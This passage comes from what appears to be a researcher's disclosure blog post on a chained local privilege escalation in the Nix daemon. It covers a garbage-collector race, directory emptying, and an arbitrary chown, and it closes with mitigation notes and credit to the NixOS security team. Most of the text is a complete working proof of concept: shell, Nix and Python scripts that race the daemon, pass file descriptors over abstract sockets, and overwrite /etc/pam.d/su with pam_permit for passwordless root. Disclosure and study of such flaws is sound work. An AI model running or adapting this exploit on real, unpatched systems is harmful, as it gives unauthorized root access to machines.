By the time we get to the chown, the file being chowned points to anything we would like to target, which then gets chowned to UID 30001 aka nixbld1, which we can control. The chown is performed by the nix daemon as root, outside the build sandbox, so we can essentially target anything.

Cheating validation

Since we’re working on a research machine here, we can cheat a little to validate this step without needing to build the whole proof of concept around it. Logging in as root, we can use a quick shell script to prove out our idea:

1touch /TEST
2ls -l /TEST
3echo "waiting for dir"
4until [ -e /tmp/nix-build-demo.drv-0 ]; do :; done
5rm -rf /tmp/nix-build-demo.drv-0
6mkdir -p /tmp/nix-build-demo.drv-0/build
7echo "waiting for file"
8until [ -e /tmp/nix-build-demo.drv-0/build/.attr-[hash] ]; do :; done
9ln -sf /TEST /tmp/nix-build-demo.drv-0/build/.attr-[hash]

This script essentially replaces the exploitation of the directory deletion with a targeted rm -rf. Running this script and the following build file concurrently, we see the following output:

1let
2  pkgs = import <nixpkgs> { };
3  passmefilesize = 100000000;
4  outputcount = 5000;
5in
6pkgs.stdenv.mkDerivation {
7  name = "demo";
8  builder = "/bin/sh";
9  args = ["-c" "${pkgs.coreutils}/bin/env"];
10  system = builtins.currentSystem;
11  passAsFile = ["passme"];
12  passme = pkgs.lib.concatMapStrings (_: "A") (pkgs.lib.range 1 passmefilesize);
13  outputs = builtins.genList (x: "a"+(toString x)) outputcount; # used to slow down exploitation and improve reliability
14}

1[nix-shell:/tmp]# sh run.sh
2-rw-r--r-- 1 root root 0 Apr  3 10:53 /TEST
3waiting for dir
4waiting for file
5
6[nix-shell:/tmp]# ls -l /TEST
7-rw-r--r-- 1 nixbld1 nixbld 0 Apr  3 10:53 /TEST

Success

Success! We’ve been able to perform an arbitrary chown of a file from root-owned to nixbld1.

Putting it all together in order, we’ve found:

We can control files inside a privileged location (the nix store), after it is expected that they can no longer be changed
Using this persistent access, we’ve found a race condition that lets us exploit the garbage collector to empty arbitrary directories
Using this arbitrary directory emptying, we’ve found a location in a writable directory (/tmp) that unsafely handles files, assuming they’re only root accessible

Exploiting these 3 vulnerabilities in order, we can now change the ownership of arbitrary files or directories in the system to a user we can run arbitrary code as.

The final step is to chown something that will let us escalate our privileges to root. There are many, many ways this can be achieved. In this case, I chose to target /etc/pam.d, a location where authentication configuration files are stored.

Once we have targeted this directory and changed its ownership to nixbld1, it’s necessary to run one final build process. This time, we will use our external cooperating process to pass a file descriptor to /etc/pam.d to the process inside the sandbox. Whilst the nixbld1 user owns this directory, it’s not inside the build sandbox, so the process cannot access it on its own. We can easily pass a reference to the directory into the sandbox so our nixbld1 code can write files as it pleases. (I also found and reported a vulnerability that would let you create a setuid binary for the nixbld1 user, allowing code execution as this user outside the sandbox, but that is a story for another blog post)

Overwriting the configuration file for su with

1account required pam_unix.so
2auth required pam_permit.so
3session required pam_unix.so

Allowing any user to use the su binary to escalate to root with no password required, giving an interactive root shell.

Conclusion

Multi-step vulnerability chains are much harder to identify and build into something meaningful without significant deep research, but protecting against them doesn’t necessarily need to be hard. Careful use of system functionality, such as file deletion and permission changes, where incorrect use can have disastrous effects, can change the category of a block of at-risk code from ‘vulnerable’ to ‘not vulnerable’. Handling everything with validated, relative file descriptors can make exploitation infeasible or impossible, and avoiding the use of world-writable directories, even with the sticky bit, can mean needing many more individual vulnerabilities to successfully exploit a chain, making it that much less likely.

Huge shout out to the NixOS Security Team, who jumped on this vulnerability report, and looped in all of the projects that may have been impacted due to code or architecture reuse (namely Lix and Guix in addition to Nix). The teams implemented effective patches to these vulnerabilities as follows:

For passing file descriptors outside the sandbox, they have implemented the use of pasta networking, which allows for the isolation of network namespaces (and therefore abstract unix sockets) whilst still enabling internet access
For the directory emptying vulnerability, they have ensured that all paths are relative, so the directory file descriptor is not ignored by the call to openat
For the arbitrary chown vulnerability, they have ensured that the .attr-... passAsFile files are only interacted with by file descriptor, using fchmod on the file descriptor rather than chmod
They also implemented several related and hardening patches, including the issues noted as not practically exploitable above

For a full accounting of the changes, please see the advisories, linked at the top of this post.

Final proof of concept

The whole proof of concept ends up being relatively short, split across a few files. There are additional minutiae in these scripts to make the exploitation more reliable, which are left as an exercise for the reader.

1# privesc.sh
2rm -f *.log
3mkdir -p tmp
4export TMPDIR=$PWD/tmp
5
6TARGET_NAME=test00005 # must match racetarget.nix
7PASSASFILE_NAME=passme # must match racetarget.nix
8
9PASSASFILE_FILENAME=.attr-$(nix --extra-experimental-features nix-command eval --expr 'builtins.convertHash { hash = builtins.hashString "sha256" "'${PASSASFILE_NAME}'"; toHashFormat = "nix32"; hashAlgo = "sha256"; }' --raw)
10BUILD_DIR=/tmp/nix-build-${TARGET_NAME}.drv-0
11
12python3 server.py &
13
14(sleep 2; nix-build racetarget.nix >racetarget.log 2>&1) &
15
16echo waiting for dir creation
17
18until [ -e ${BUILD_DIR} ]; do :; done; while [ -e ${BUILD_DIR} ]; do nix-build delracer.nix >delracer.log 2>&1; done
19
20echo waiting for file creation
21
22mkdir -p ${BUILD_DIR}/build
23cd ${BUILD_DIR}/build
24
25until [ -e $PASSASFILE_FILENAME ]; do :; done
26ln -sf /etc/pam.d $PASSASFILE_FILENAME
27
28echo "writing pam su"
29
30cd - >/dev/null
31echo "waiting for nixbld1"
32sleep 10
33
34nix-build pam.nix >pam.log 2>&1
35
36echo "cleaning up"
37rm -rf tmp
38nix-collect-garbage >/dev/null 2>&1
39touch /tmp/exploit_finished
40
41su -c 'chown root:root /etc/pam.d; mv /etc/pam.d/su.old /etc/pam.d/su; bash'

1# racetarget.nix
2let
3  pkgs = import <nixpkgs> { };
4  # both of the following can be decreased to save time, but will also decreate reliability
5  # current settings take about 52 seconds on my machine, but is very reliable
6  # it's dependent on disk speed. passmefilesize is used for a large(slow) file write, outputcount is for creating a large number of lockfiles
7  passmefilesize = 100000000;
8  outputcount = 5000;
9in
10pkgs.stdenv.mkDerivation {
11  name = "test00005";
12  builder = "/bin/sh";
13  args = ["-c" ":"];
14  system = builtins.currentSystem;
15  passAsFile = ["passme"];
16  passme = pkgs.lib.concatMapStrings (_: "A") (pkgs.lib.range 1 passmefilesize);
17  outputs = builtins.genList (x: "a"+(toString x)) outputcount;
18}

1# delracer.nix
2let
3  pkgs = import <nixpkgs> { };
4in
5pkgs.stdenv.mkDerivation {
6  name = "test00006";
7  builder = "/bin/bash";
8  args = ["-c" ''
9echo $out
10TARGET=/tmp
11${pkgs.coreutils}/bin/mkdir -p $out/a/b/a{0000..1000}
12${pkgs.coreutils}/bin/mkdir -p $out/z.new/b/
13
14for i in {0000..1000}; do
15        ${pkgs.coreutils}/bin/ln -s $TARGET $out/z.new/b/a$i
16done
17
18${pkgs.coreutils}/bin/chmod 777 $out
19${pkgs.python3}/bin/python -c 'import socket,os,array;s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM); s.connect(chr(0) +"DELRACER");s.sendmsg([b"A"], [(socket.SOL_SOCKET, socket.SCM_RIGHTS, array.array("i", [os.open(os.environ["out"], os.O_PATH)]))])'
20false
21''];
22  system = builtins.currentSystem;
23  outputHash = pkgs.lib.fakeHash;
24  outputHashMode = "recursive";
25}

1# pam.nix
2let
3  pkgs = import <nixpkgs> { };
4in
5pkgs.stdenv.mkDerivation {
6  name = "test00006";
7  builder = "/bin/bash";
8  args = ["-c" ''
9${pkgs.python3}/bin/python -c 'import socket,os,array;s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM); s.connect(chr(0) +"ETCPAMD"); data,ancdata,flags,addr = s.recvmsg(1, socket.CMSG_LEN(4)); fd=int.from_bytes(ancdata[0][2], "little");os.fchdir(fd);os.rename("su", "su.old");open("su", "w").write("account required pam_unix.so\nauth required pam_permit.so\nsession required pam_unix.so")'
10
11false
12''];
13  system = builtins.currentSystem;
14  outputHash = pkgs.lib.fakeHash;
15  outputHashMode = "recursive";
16}

1# server.py
2import socket
3import os
4import array
5import time
6import signal
7
8racer_pid = os.fork()
9if not racer_pid:
10    print("delracer running")
11    s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
12    s.bind(chr(0) + "DELRACER")
13    s.listen(1)
14    while a := s.accept():
15        c, _ = a
16        data, ancdata, flags, addr = c.recvmsg(1, socket.CMSG_LEN(4))
17        received_fd = int.from_bytes(ancdata[0][2], "little")
18        os.fchdir(received_fd)
19
20        while os.path.exists("a/b/a0000"):
21            ...
22        os.rename("a", "a.old")
23        os.rename("z.new", "a")
24
25        os.chdir("/")
26
27pam_pid = os.fork()
28if not pam_pid:
29    print("pam server running")
30    fd = os.open("/etc/pam.d", os.O_DIRECTORY)
31    s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
32    s.bind(chr(0) + "ETCPAMD")
33    s.listen(1)
34
35    while a := s.accept():
36        c, _ = a
37        c.sendmsg([b"A"], [(socket.SOL_SOCKET, socket.SCM_RIGHTS, array.array("i", [fd]))])
38
39while not os.path.exists("/tmp/exploit_finished"):
40    time.sleep(1)
41
42os.unlink("/tmp/exploit_finished")
43os.kill(racer_pid, signal.SIGTERM)
44os.kill(pam_pid, signal.SIGTERM)